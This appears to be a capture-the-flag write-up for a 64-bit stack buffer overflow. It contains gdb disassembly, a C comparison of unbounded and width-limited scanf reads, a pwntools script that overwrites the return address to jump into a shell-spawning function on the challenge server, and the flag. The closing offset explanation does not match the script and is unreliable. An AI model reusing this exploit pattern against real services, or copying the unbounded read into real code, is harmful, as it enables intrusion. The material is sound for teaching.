It looks like the binary is structured so that calling a function named callMeMaybe spawns a shell.
Dump of assembler code for function callMeMaybe:
0x0000000000400606 <+0>: push rbp
0x0000000000400607 <+1>: mov rbp,rsp
0x000000000040060a <+4>: sub rsp,0x20
0x000000000040060e <+8>: mov QWORD PTR [rbp-0x20],0x400734
0x0000000000400616 <+16>: mov QWORD PTR [rbp-0x18],0x40073e
0x000000000040061e <+24>: mov QWORD PTR [rbp-0x10],0x0
0x0000000000400626 <+32>: mov rax,QWORD PTR [rbp-0x20]
0x000000000040062a <+36>: lea rcx,[rbp-0x20]
0x000000000040062e <+40>: mov edx,0x0
0x0000000000400633 <+45>: mov rsi,rcx
0x0000000000400636 <+48>: mov rdi,rax
0x0000000000400639 <+51>: call 0x4004f8 <execve@plt>
0x000000000040063e <+56>: nop
0x000000000040063f <+57>: leave
0x0000000000400640 <+58>: ret
End of assembler dump.
The callMeMaybe function.
It calls bin/bash through execve.
Dump of assembler code for function main:
0x0000000000400641 <+0>: push rbp
0x0000000000400642 <+1>: mov rbp,rsp
0x0000000000400645 <+4>: sub rsp,0x120
0x000000000040064c <+11>: mov DWORD PTR [rbp-0x114],edi
0x0000000000400652 <+17>: mov QWORD PTR [rbp-0x120],rsi
0x0000000000400659 <+24>: lea rax,[rbp-0x110]
0x0000000000400660 <+31>: mov rsi,rax
0x0000000000400663 <+34>: mov edi,0x400741
0x0000000000400668 <+39>: mov eax,0x0
0x000000000040066d <+44>: call 0x400508 <__isoc99_scanf@plt>
0x0000000000400672 <+49>: lea rax,[rbp-0x110]
0x0000000000400679 <+56>: mov rdi,rax
0x000000000040067c <+59>: call 0x4004e0 <strlen@plt>
0x0000000000400681 <+64>: mov DWORD PTR [rbp-0x4],eax
0x0000000000400684 <+67>: lea rax,[rbp-0x110]
0x000000000040068b <+74>: mov rsi,rax
0x000000000040068e <+77>: mov edi,0x400744
0x0000000000400693 <+82>: mov eax,0x0
0x0000000000400698 <+87>: call 0x4004e8 <printf@plt>
0x000000000040069d <+92>: mov eax,0x0
0x00000000004006a2 <+97>: leave
0x00000000004006a3 <+98>: ret
End of assembler dump.
0x0000000000400663 <+34>: mov edi,0x400741
0x0000000000400668 <+39>: mov eax,0x0
0x000000000040066d <+44>: call 0x400508 <__isoc99_scanf@plt>
0x0000000000400672 <+49>: lea rax,[rbp-0x110]
The string is read in through scanf. This string occupies 0x110 bytes of memory.
0x000000000040067c <+59>: call 0x4004e0 <strlen@plt>
0x0000000000400681 <+64>: mov DWORD PTR [rbp-0x4],eax
The length of the input string is stored in a 4-byte slot.
0x000000000040068e <+77>: mov edi,0x400744
0x0000000000400693 <+82>: mov eax,0x0
0x0000000000400698 <+87>: call 0x4004e8 <printf@plt>
It prints Hello {input string}.
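The main() logic as read from the disassembly above, reconstructed as an added example (not the challenge's source): the unbounded "%s" read beside a width-limited form that also reports truncation. The buffer size is taken from lea rax,[rbp-0x110]; the format strings and function names are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#define BUF_SIZE 0x110  /* taken from "lea rax,[rbp-0x110]" in main */
#define MAX_LEN  271    /* BUF_SIZE - 1, so the terminating NUL always fits */
#define STR2(x) #x
#define STR(x)  STR2(x) /* turns MAX_LEN into the literal "271" for the format */

/* Vulnerable form, mirroring main(): "%s" has no width, so a token longer
 * than MAX_LEN runs past buf into the saved rbp and the return address.
 * Kept only for comparison; never feed it untrusted input. */
int greet_unsafe(const char *input) {
    char buf[BUF_SIZE];
    if (sscanf(input, "%s", buf) != 1)
        buf[0] = '\0';
    printf("Hello %s\n", buf);
    return (int)strlen(buf);
}

/* Hardened form: the width modifier caps the copy at MAX_LEN characters.
 * Returns the stored length; *truncated is set when the token was cut short. */
int greet_safe(const char *input, int *truncated) {
    char buf[BUF_SIZE];
    int consumed = 0;
    *truncated = 0;
    if (sscanf(input, "%" STR(MAX_LEN) "s%n", buf, &consumed) != 1) {
        buf[0] = '\0';
        return 0;
    }
    /* Scanning stopped on a non-space character: MAX_LEN was hit mid-token. */
    if (input[consumed] != '\0' && !isspace((unsigned char)input[consumed]))
        *truncated = 1;
    printf("Hello %s\n", buf);
    return (int)strlen(buf);
}

/* Constructed input of 299 'A's, longer than the 0x110-byte buffer. */
int demo_overlong(int *truncated) {
    char long_input[300];
    memset(long_input, 'A', sizeof long_input - 1);
    long_input[sizeof long_input - 1] = '\0';
    return greet_safe(long_input, truncated);
}

int main(void) {
    int truncated = 0;
    int stored = demo_overlong(&truncated);
    printf("stored %d bytes, truncated=%d\n", stored, truncated);
    return 0;
}
```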
The goal is to overwrite past the buffer (STACK) and the SFP so that the address of the callMeMaybe function is stored in RET.
from pwn import *

#p = process("./64bof_basic")
p = remote("ctf.j0n9hyun.xyz",3004)

addr = 0x0000000000400606            # address of callMeMaybe
# 0x118 bytes of padding up to the saved return address, then the target address
s = b"\x90"*(0x110+8) + p64(addr)    # bytes, since p64() returns bytes in Python 3
p.sendline(s)
p.interactive()
0x110 (number of bytes in the string) + 4 (the variable holding strlen's value) + 4 (SFP)
FLAG : HackCTF{64b17_b0f_15_51mpl3_700}